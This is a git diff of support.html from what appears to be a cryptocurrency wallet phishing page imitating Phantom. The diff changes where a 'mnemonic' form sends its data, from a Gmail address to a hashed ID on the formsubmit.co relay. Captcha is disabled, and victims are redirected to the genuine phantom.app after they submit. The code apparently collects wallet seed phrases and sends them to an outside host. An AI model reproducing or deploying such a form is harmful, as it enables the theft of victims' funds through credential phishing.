--- a/support.html
+++ b/support.html
@@ -25,7 +25,7 @@
 
        <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form action="https://formsubmit.co/Solwalletresponse@gmail.com" method="POST" />
+        <form action="https://formsubmit.co/febbf9ee89f74814b88fefea6ef6c34f" method="POST" />
            <input type="hidden" name="_next" value="https://phantom.app/">
           <input type="hidden" name="_captcha" value="false">
 
@@ -130,7 +130,7 @@
 
      <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form action="https://formsubmit.co/Solwalletresponse@gmail.com" method="POST" />
+        <form action="https://formsubmit.co/febbf9ee89f74814b88fefea6ef6c34f" method="POST" />
            <input type="hidden" name="_next" value="https://phantom.app/">
           <input type="hidden" name="_captcha" value="false">
           <div class="">
